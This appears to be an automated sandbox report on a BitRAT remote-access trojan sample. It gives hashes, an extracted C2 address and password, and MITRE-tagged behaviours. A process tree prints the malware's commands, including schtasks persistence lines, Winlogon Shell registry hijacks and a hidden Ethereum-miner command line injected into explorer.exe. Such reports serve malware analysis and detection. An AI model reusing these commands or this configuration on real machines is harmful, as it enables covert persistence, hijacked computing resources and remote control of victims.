bitrat | aee478258bbebf0a4cb76eb703c210fa363edbb22d484fe3e6fbcf5f2c3d1af4

Resubmissions

03/03/2025, 05:49

250303-gjhrcayxf1 10

26/04/2021, 22:57

210426-27fq4xrdvx 10

Analysis

max time kernel
300s
max time network
302s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20250217-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20250217-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
03/03/2025, 05:49

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

6c2934d4_by_Libranalysis.exe
Size

3.5MB
MD5

6c2934d437e948bf2727a4358edb9a59
SHA1

f5a10d17ebb6c2bd247156387d19accc6819cd3f
SHA256

aee478258bbebf0a4cb76eb703c210fa363edbb22d484fe3e6fbcf5f2c3d1af4
SHA512

ccb7c83a5c4f9f96aeeb03ee1460d964bae698e7a0d6b3aec1ab96af0ca7230173023c5c3b1cef29283053153181c69aec3a96bb027e3b39a94fd50ccdf5c246
SSDEEP

98304:CUXQ+L8dHaxE8npS7rpjYSxFnwKfLzy7iV/mtmY2:C6LKHaWCp/SHPje7iV/

Score

10^/10

bitrat discovery persistence trojan upx

Malware Config

Extracted

Family

bitrat

Version

1.35

23.105.131.209:8888

Attributes

communication_password
cfcd208495d565ef66e7dff9f98764da
tor_process
tor

Signatures

BitRAT
BitRAT is a remote access tool written in C++ and uses leaked source code from other families.
trojan bitrat
Bitrat family
bitrat

Modifies WinLogon for persistence 2 TTPs 5 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3452737631-513087862-588053281-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "\"C:\\Users\\Admin\\AppData\\Roaming\\nDlv4j2nb6r0yUVx\\dHydn6euU3EH.exe\",explorer.exe"	6c2934d4_by_Libranalysis.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3452737631-513087862-588053281-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "\"C:\\Users\\Admin\\AppData\\Roaming\\nDlv4j2nb6r0yUVx\\0mQFFfrjV7Eo.exe\",explorer.exe"	6c2934d4_by_Libranalysis.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3452737631-513087862-588053281-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "\"C:\\Users\\Admin\\AppData\\Roaming\\nDlv4j2nb6r0yUVx\\EUuxzctaNVaB.exe\",explorer.exe"	6c2934d4_by_Libranalysis.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3452737631-513087862-588053281-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "\"C:\\Users\\Admin\\AppData\\Roaming\\nDlv4j2nb6r0yUVx\\f8DBABO3WWTf.exe\",explorer.exe"	6c2934d4_by_Libranalysis.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3452737631-513087862-588053281-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "\"C:\\Users\\Admin\\AppData\\Roaming\\nDlv4j2nb6r0yUVx\\FnHQ1tbt3CIZ.exe\",explorer.exe"	6c2934d4_by_Libranalysis.exe

Checks computer location settings 2 TTPs 17 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3452737631-513087862-588053281-1000\Control Panel\International\Geo\Nation	0mQFFfrjV7EolJeg.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3452737631-513087862-588053281-1000\Control Panel\International\Geo\Nation	wsappx.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3452737631-513087862-588053281-1000\Control Panel\International\Geo\Nation	wsappx.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3452737631-513087862-588053281-1000\Control Panel\International\Geo\Nation	steamgfx.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3452737631-513087862-588053281-1000\Control Panel\International\Geo\Nation	sihost32.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3452737631-513087862-588053281-1000\Control Panel\International\Geo\Nation	6c2934d4_by_Libranalysis.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3452737631-513087862-588053281-1000\Control Panel\International\Geo\Nation	dHydn6euU3EHg6xc.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3452737631-513087862-588053281-1000\Control Panel\International\Geo\Nation	wsappx.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3452737631-513087862-588053281-1000\Control Panel\International\Geo\Nation	OXa0b7j6UK2eymz6.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3452737631-513087862-588053281-1000\Control Panel\International\Geo\Nation	wsappx.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3452737631-513087862-588053281-1000\Control Panel\International\Geo\Nation	sihost32.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3452737631-513087862-588053281-1000\Control Panel\International\Geo\Nation	steamgfx.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3452737631-513087862-588053281-1000\Control Panel\International\Geo\Nation	steamgfx.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3452737631-513087862-588053281-1000\Control Panel\International\Geo\Nation	steamgfx.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3452737631-513087862-588053281-1000\Control Panel\International\Geo\Nation	xNRbDmpi0G3360Ee.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3452737631-513087862-588053281-1000\Control Panel\International\Geo\Nation	wsappx.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3452737631-513087862-588053281-1000\Control Panel\International\Geo\Nation	FnHQ1tbt3CIZkUeE.exe

Executes dropped EXE 21 IoCs

pid	Process
3596	dHydn6euU3EHg6xc.exe
4664	wsappx.exe
892	sihost32.exe
4076	steamgfx.exe
4924	0mQFFfrjV7EolJeg.exe
1740	xNRbDmpi0G3360Ee.exe
1172	wsappx.exe
4664	wsappx.exe
3740	sihost32.exe
1432	OXa0b7j6UK2eymz6.exe
4208	wsappx.exe
4532	sihost32.exe
4412	steamgfx.exe
3668	FnHQ1tbt3CIZkUeE.exe
3812	wsappx.exe
3624	sihost32.exe
3220	sihost32.exe
3124	sihost32.exe
4884	steamgfx.exe
448	sihost32.exe
648	steamgfx.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs

pid	Process
2104	cvtres.exe
2104	cvtres.exe
2104	cvtres.exe
2104	cvtres.exe
4564	cvtres.exe
4672	cvtres.exe
336	cvtres.exe
4156	cvtres.exe

Suspicious use of SetThreadContext 11 IoCs

description	pid	Process	procid_target
PID 3824 set thread context of 2104	3824	6c2934d4_by_Libranalysis.exe	86
PID 1984 set thread context of 4564	1984	6c2934d4_by_Libranalysis.exe	111
PID 928 set thread context of 4672	928	6c2934d4_by_Libranalysis.exe	113
PID 4076 set thread context of 1444	4076	steamgfx.exe	123
PID 3248 set thread context of 336	3248	6c2934d4_by_Libranalysis.exe	125
PID 2408 set thread context of 4156	2408	6c2934d4_by_Libranalysis.exe	136
PID 1172 set thread context of 992	1172	wsappx.exe	142
PID 4664 set thread context of 2776	4664	wsappx.exe	143
PID 4412 set thread context of 4336	4412	steamgfx.exe	145
PID 3812 set thread context of 1444	3812	wsappx.exe	147
PID 4884 set thread context of 2620	4884	steamgfx.exe	153

UPX packed file 42 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/2104-13-0x0000000000400000-0x00000000007E4000-memory.dmp	upx
behavioral1/memory/2104-16-0x0000000000400000-0x00000000007E4000-memory.dmp	upx
behavioral1/memory/2104-17-0x0000000000400000-0x00000000007E4000-memory.dmp	upx
behavioral1/memory/2104-19-0x0000000000400000-0x00000000007E4000-memory.dmp	upx
behavioral1/memory/2104-15-0x0000000000400000-0x00000000007E4000-memory.dmp	upx
behavioral1/memory/2104-46-0x0000000000400000-0x00000000007E4000-memory.dmp	upx
behavioral1/memory/2104-40-0x0000000000400000-0x00000000007E4000-memory.dmp	upx
behavioral1/memory/2104-51-0x0000000000400000-0x00000000007E4000-memory.dmp	upx
behavioral1/memory/2104-53-0x0000000000400000-0x00000000007E4000-memory.dmp	upx
behavioral1/memory/2104-54-0x0000000000400000-0x00000000007E4000-memory.dmp	upx
behavioral1/memory/2104-55-0x0000000000400000-0x00000000007E4000-memory.dmp	upx
behavioral1/memory/2104-57-0x0000000000400000-0x00000000007E4000-memory.dmp	upx
behavioral1/memory/2104-58-0x0000000000400000-0x00000000007E4000-memory.dmp	upx
behavioral1/memory/2104-60-0x0000000000400000-0x00000000007E4000-memory.dmp	upx
behavioral1/memory/2104-61-0x0000000000400000-0x00000000007E4000-memory.dmp	upx
behavioral1/memory/2104-63-0x0000000000400000-0x00000000007E4000-memory.dmp	upx
behavioral1/memory/2104-64-0x0000000000400000-0x00000000007E4000-memory.dmp	upx
behavioral1/memory/2104-69-0x0000000000400000-0x00000000007E4000-memory.dmp	upx
behavioral1/memory/2104-67-0x0000000000400000-0x00000000007E4000-memory.dmp	upx
behavioral1/memory/2104-66-0x0000000000400000-0x00000000007E4000-memory.dmp	upx
behavioral1/memory/2104-92-0x0000000000400000-0x00000000007E4000-memory.dmp	upx
behavioral1/memory/2104-90-0x0000000000400000-0x00000000007E4000-memory.dmp	upx
behavioral1/memory/2104-89-0x0000000000400000-0x00000000007E4000-memory.dmp	upx
behavioral1/memory/2104-98-0x0000000000400000-0x00000000007E4000-memory.dmp	upx
behavioral1/memory/2104-100-0x0000000000400000-0x00000000007E4000-memory.dmp	upx
behavioral1/memory/2104-101-0x0000000000400000-0x00000000007E4000-memory.dmp	upx
behavioral1/memory/2104-103-0x0000000000400000-0x00000000007E4000-memory.dmp	upx
behavioral1/memory/2104-104-0x0000000000400000-0x00000000007E4000-memory.dmp	upx
behavioral1/memory/2104-106-0x0000000000400000-0x00000000007E4000-memory.dmp	upx
behavioral1/memory/2104-105-0x0000000000400000-0x00000000007E4000-memory.dmp	upx
behavioral1/memory/2104-108-0x0000000000400000-0x00000000007E4000-memory.dmp	upx
behavioral1/memory/2104-109-0x0000000000400000-0x00000000007E4000-memory.dmp	upx
behavioral1/memory/4564-126-0x0000000000400000-0x00000000007E4000-memory.dmp	upx
behavioral1/memory/4564-176-0x0000000000400000-0x00000000007E4000-memory.dmp	upx
behavioral1/memory/4672-191-0x0000000000400000-0x00000000007E4000-memory.dmp	upx
behavioral1/memory/4672-195-0x0000000000400000-0x00000000007E4000-memory.dmp	upx
behavioral1/memory/2104-202-0x0000000000400000-0x00000000007E4000-memory.dmp	upx
behavioral1/memory/336-217-0x0000000000400000-0x00000000007E4000-memory.dmp	upx
behavioral1/memory/336-239-0x0000000000400000-0x00000000007E4000-memory.dmp	upx
behavioral1/memory/2104-241-0x0000000000400000-0x00000000007E4000-memory.dmp	upx
behavioral1/memory/4156-277-0x0000000000400000-0x00000000007E4000-memory.dmp	upx
behavioral1/memory/4156-299-0x0000000000400000-0x00000000007E4000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 15 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dHydn6euU3EHg6xc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	6c2934d4_by_Libranalysis.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	6c2934d4_by_Libranalysis.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	6c2934d4_by_Libranalysis.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xNRbDmpi0G3360Ee.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	6c2934d4_by_Libranalysis.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	6c2934d4_by_Libranalysis.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	0mQFFfrjV7EolJeg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	OXa0b7j6UK2eymz6.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	FnHQ1tbt3CIZkUeE.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3452737631-513087862-588053281-1000_Classes\Local Settings	explorer.exe

NTFS ADS 2 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Local:03-03-2025	cvtres.exe
File created	C:\Users\Admin\AppData\Local:03-03-2025	cvtres.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 9 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
3096	schtasks.exe
976	schtasks.exe
408	schtasks.exe
1052	schtasks.exe
3348	schtasks.exe
2492	schtasks.exe
3716	schtasks.exe
5080	schtasks.exe
904	schtasks.exe

Suspicious behavior: EnumeratesProcesses 29 IoCs

pid	Process
3824	6c2934d4_by_Libranalysis.exe
3824	6c2934d4_by_Libranalysis.exe
4664	wsappx.exe
4664	wsappx.exe
1984	6c2934d4_by_Libranalysis.exe
1984	6c2934d4_by_Libranalysis.exe
4076	steamgfx.exe
4076	steamgfx.exe
928	6c2934d4_by_Libranalysis.exe
928	6c2934d4_by_Libranalysis.exe
4076	steamgfx.exe
3248	6c2934d4_by_Libranalysis.exe
3248	6c2934d4_by_Libranalysis.exe
4208	wsappx.exe
4208	wsappx.exe
4208	wsappx.exe
2408	6c2934d4_by_Libranalysis.exe
2408	6c2934d4_by_Libranalysis.exe
1172	wsappx.exe
1172	wsappx.exe
4664	wsappx.exe
4664	wsappx.exe
1172	wsappx.exe
4412	steamgfx.exe
4412	steamgfx.exe
3812	wsappx.exe
3812	wsappx.exe
4884	steamgfx.exe
4884	steamgfx.exe

Suspicious use of AdjustPrivilegeToken 19 IoCs

description	pid	Process
Token: SeDebugPrivilege	3824	6c2934d4_by_Libranalysis.exe
Token: SeShutdownPrivilege	2104	cvtres.exe
Token: SeDebugPrivilege	4664	wsappx.exe
Token: SeDebugPrivilege	4076	steamgfx.exe
Token: SeDebugPrivilege	1984	6c2934d4_by_Libranalysis.exe
Token: SeDebugPrivilege	928	6c2934d4_by_Libranalysis.exe
Token: SeShutdownPrivilege	4564	cvtres.exe
Token: SeDebugPrivilege	1172	wsappx.exe
Token: SeShutdownPrivilege	4672	cvtres.exe
Token: SeDebugPrivilege	4664	wsappx.exe
Token: SeDebugPrivilege	3248	6c2934d4_by_Libranalysis.exe
Token: SeDebugPrivilege	4208	wsappx.exe
Token: SeShutdownPrivilege	336	cvtres.exe
Token: SeDebugPrivilege	4412	steamgfx.exe
Token: SeDebugPrivilege	2408	6c2934d4_by_Libranalysis.exe
Token: SeDebugPrivilege	3812	wsappx.exe
Token: SeShutdownPrivilege	4156	cvtres.exe
Token: SeDebugPrivilege	4884	steamgfx.exe
Token: SeDebugPrivilege	648	steamgfx.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
2104	cvtres.exe
2104	cvtres.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3824 wrote to memory of 3596	3824	6c2934d4_by_Libranalysis.exe	85
PID 3824 wrote to memory of 3596	3824	6c2934d4_by_Libranalysis.exe	85
PID 3824 wrote to memory of 3596	3824	6c2934d4_by_Libranalysis.exe	85
PID 3824 wrote to memory of 2104	3824	6c2934d4_by_Libranalysis.exe	86
PID 3824 wrote to memory of 2104	3824	6c2934d4_by_Libranalysis.exe	86
PID 3824 wrote to memory of 2104	3824	6c2934d4_by_Libranalysis.exe	86
PID 3824 wrote to memory of 2104	3824	6c2934d4_by_Libranalysis.exe	86
PID 3824 wrote to memory of 2104	3824	6c2934d4_by_Libranalysis.exe	86
PID 3824 wrote to memory of 2104	3824	6c2934d4_by_Libranalysis.exe	86
PID 3824 wrote to memory of 2104	3824	6c2934d4_by_Libranalysis.exe	86
PID 3596 wrote to memory of 4664	3596	dHydn6euU3EHg6xc.exe	88
PID 3596 wrote to memory of 4664	3596	dHydn6euU3EHg6xc.exe	88
PID 4664 wrote to memory of 4892	4664	wsappx.exe	90
PID 4664 wrote to memory of 4892	4664	wsappx.exe	90
PID 4892 wrote to memory of 904	4892	cmd.exe	92
PID 4892 wrote to memory of 904	4892	cmd.exe	92
PID 4664 wrote to memory of 892	4664	wsappx.exe	98
PID 4664 wrote to memory of 892	4664	wsappx.exe	98
PID 4664 wrote to memory of 4076	4664	wsappx.exe	99
PID 4664 wrote to memory of 4076	4664	wsappx.exe	99
PID 4076 wrote to memory of 4764	4076	steamgfx.exe	101
PID 4076 wrote to memory of 4764	4076	steamgfx.exe	101
PID 4764 wrote to memory of 3096	4764	cmd.exe	103
PID 4764 wrote to memory of 3096	4764	cmd.exe	103
PID 1984 wrote to memory of 4924	1984	6c2934d4_by_Libranalysis.exe	110
PID 1984 wrote to memory of 4924	1984	6c2934d4_by_Libranalysis.exe	110
PID 1984 wrote to memory of 4924	1984	6c2934d4_by_Libranalysis.exe	110
PID 1984 wrote to memory of 4564	1984	6c2934d4_by_Libranalysis.exe	111
PID 1984 wrote to memory of 4564	1984	6c2934d4_by_Libranalysis.exe	111
PID 1984 wrote to memory of 4564	1984	6c2934d4_by_Libranalysis.exe	111
PID 1984 wrote to memory of 4564	1984	6c2934d4_by_Libranalysis.exe	111
PID 1984 wrote to memory of 4564	1984	6c2934d4_by_Libranalysis.exe	111
PID 1984 wrote to memory of 4564	1984	6c2934d4_by_Libranalysis.exe	111
PID 1984 wrote to memory of 4564	1984	6c2934d4_by_Libranalysis.exe	111
PID 928 wrote to memory of 1740	928	6c2934d4_by_Libranalysis.exe	112
PID 928 wrote to memory of 1740	928	6c2934d4_by_Libranalysis.exe	112
PID 928 wrote to memory of 1740	928	6c2934d4_by_Libranalysis.exe	112
PID 928 wrote to memory of 4672	928	6c2934d4_by_Libranalysis.exe	113
PID 928 wrote to memory of 4672	928	6c2934d4_by_Libranalysis.exe	113
PID 928 wrote to memory of 4672	928	6c2934d4_by_Libranalysis.exe	113
PID 928 wrote to memory of 4672	928	6c2934d4_by_Libranalysis.exe	113
PID 928 wrote to memory of 4672	928	6c2934d4_by_Libranalysis.exe	113
PID 928 wrote to memory of 4672	928	6c2934d4_by_Libranalysis.exe	113
PID 928 wrote to memory of 4672	928	6c2934d4_by_Libranalysis.exe	113
PID 4924 wrote to memory of 1172	4924	0mQFFfrjV7EolJeg.exe	114
PID 4924 wrote to memory of 1172	4924	0mQFFfrjV7EolJeg.exe	114
PID 1740 wrote to memory of 4664	1740	xNRbDmpi0G3360Ee.exe	115
PID 1740 wrote to memory of 4664	1740	xNRbDmpi0G3360Ee.exe	115
PID 1172 wrote to memory of 1168	1172	wsappx.exe	116
PID 1172 wrote to memory of 1168	1172	wsappx.exe	116
PID 4664 wrote to memory of 3800	4664	wsappx.exe	118
PID 4664 wrote to memory of 3800	4664	wsappx.exe	118
PID 1168 wrote to memory of 976	1168	cmd.exe	120
PID 1168 wrote to memory of 976	1168	cmd.exe	120
PID 3800 wrote to memory of 408	3800	cmd.exe	121
PID 3800 wrote to memory of 408	3800	cmd.exe	121
PID 4076 wrote to memory of 3740	4076	steamgfx.exe	122
PID 4076 wrote to memory of 3740	4076	steamgfx.exe	122
PID 4076 wrote to memory of 1444	4076	steamgfx.exe	123
PID 4076 wrote to memory of 1444	4076	steamgfx.exe	123
PID 4076 wrote to memory of 1444	4076	steamgfx.exe	123
PID 4076 wrote to memory of 1444	4076	steamgfx.exe	123
PID 4076 wrote to memory of 1444	4076	steamgfx.exe	123
PID 4076 wrote to memory of 1444	4076	steamgfx.exe	123

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\6c2934d4_by_Libranalysis.exe
"C:\Users\Admin\AppData\Local\Temp\6c2934d4_by_Libranalysis.exe"
1⤵
- Modifies WinLogon for persistence
- Checks computer location settings
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3824
- C:\Users\Admin\AppData\Local\Temp\dHydn6euU3EHg6xc.exe
  "C:\Users\Admin\AppData\Local\Temp\dHydn6euU3EHg6xc.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3596
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\wsappx.exe
    "C:\Users\Admin\AppData\Local\Temp\RarSFX0\wsappx.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4664
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "steamgfx" /tr '"C:\Users\Admin\AppData\Local\Temp\steamgfx.exe"' & exit
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4892
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "steamgfx" /tr '"C:\Users\Admin\AppData\Local\Temp\steamgfx.exe"'
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:904
  - - C:\Users\Admin\AppData\Roaming\Microsoft\inc\sihost32.exe
      "C:\Users\Admin\AppData\Roaming\Microsoft\inc\sihost32.exe"
      4⤵
      Executes dropped EXE
      PID:892
  - - C:\Users\Admin\AppData\Local\Temp\steamgfx.exe
      "C:\Users\Admin\AppData\Local\Temp\steamgfx.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:4076
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "steamgfx" /tr '"C:\Users\Admin\AppData\Local\Temp\steamgfx.exe"' & exit
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4764
      - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "steamgfx" /tr '"C:\Users\Admin\AppData\Local\Temp\steamgfx.exe"'
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3096
    - - C:\Users\Admin\AppData\Roaming\Microsoft\inc\sihost32.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\inc\sihost32.exe"
        5⤵
        Executes dropped EXE
        
        PID:3740
    - - C:\Windows\explorer.exe
        
        C:\Windows\explorer.exe --response-timeout=30 --farm-retries=30 --pool stratum://`0x687ac23d19389af7925d29280d17be81f33b06c5`@eth-us-east1.nanopool.org:9999 --unam-stealth
        5⤵
        
        PID:1444
- C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
  "C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe"
  2⤵
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - NTFS ADS
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  PID:2104

C:\Windows\explorer.exe
"C:\Windows\explorer.exe" shell:::{52205fd8-5dfb-447d-801a-d0b52f2e83e1}
1⤵
PID:2868

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
1⤵
- Modifies registry class
PID:2736

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:2164

C:\Users\Admin\Desktop\6c2934d4_by_Libranalysis.exe
"C:\Users\Admin\Desktop\6c2934d4_by_Libranalysis.exe"
1⤵
- Modifies WinLogon for persistence
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1984
- C:\Users\Admin\AppData\Local\Temp\0mQFFfrjV7EolJeg.exe
  "C:\Users\Admin\AppData\Local\Temp\0mQFFfrjV7EolJeg.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4924
- - C:\Users\Admin\AppData\Local\Temp\RarSFX1\wsappx.exe
    "C:\Users\Admin\AppData\Local\Temp\RarSFX1\wsappx.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1172
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "steamgfx" /tr '"C:\Users\Admin\AppData\Local\Temp\steamgfx.exe"' & exit
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1168
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "steamgfx" /tr '"C:\Users\Admin\AppData\Local\Temp\steamgfx.exe"'
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:976
  - - C:\Users\Admin\AppData\Roaming\Microsoft\inc\sihost32.exe
      "C:\Users\Admin\AppData\Roaming\Microsoft\inc\sihost32.exe"
      4⤵
      Executes dropped EXE
      PID:3624
  - - C:\Windows\explorer.exe
      C:\Windows\explorer.exe --response-timeout=30 --farm-retries=30 --pool stratum://`0x687ac23d19389af7925d29280d17be81f33b06c5`@eth-us-east1.nanopool.org:9999 --unam-stealth
      4⤵
      PID:992
- C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
  "C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe"
  2⤵
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  PID:4564

C:\Users\Admin\Desktop\6c2934d4_by_Libranalysis.exe
"C:\Users\Admin\Desktop\6c2934d4_by_Libranalysis.exe"
1⤵
- Modifies WinLogon for persistence
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3248
- C:\Users\Admin\AppData\Local\Temp\OXa0b7j6UK2eymz6.exe
  "C:\Users\Admin\AppData\Local\Temp\OXa0b7j6UK2eymz6.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:1432
- - C:\Users\Admin\AppData\Local\Temp\RarSFX3\wsappx.exe
    "C:\Users\Admin\AppData\Local\Temp\RarSFX3\wsappx.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4208
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "steamgfx" /tr '"C:\Users\Admin\AppData\Local\Temp\steamgfx.exe"' & exit
      4⤵
      PID:4688
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "steamgfx" /tr '"C:\Users\Admin\AppData\Local\Temp\steamgfx.exe"'
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1052
  - - C:\Users\Admin\AppData\Roaming\Microsoft\inc\sihost32.exe
      "C:\Users\Admin\AppData\Roaming\Microsoft\inc\sihost32.exe"
      4⤵
      Executes dropped EXE
      PID:4532
  - - C:\Users\Admin\AppData\Local\Temp\steamgfx.exe
      "C:\Users\Admin\AppData\Local\Temp\steamgfx.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4412
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "steamgfx" /tr '"C:\Users\Admin\AppData\Local\Temp\steamgfx.exe"' & exit
        5⤵
        
        PID:4980
      - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "steamgfx" /tr '"C:\Users\Admin\AppData\Local\Temp\steamgfx.exe"'
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3348
    - - C:\Users\Admin\AppData\Roaming\Microsoft\inc\sihost32.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\inc\sihost32.exe"
        5⤵
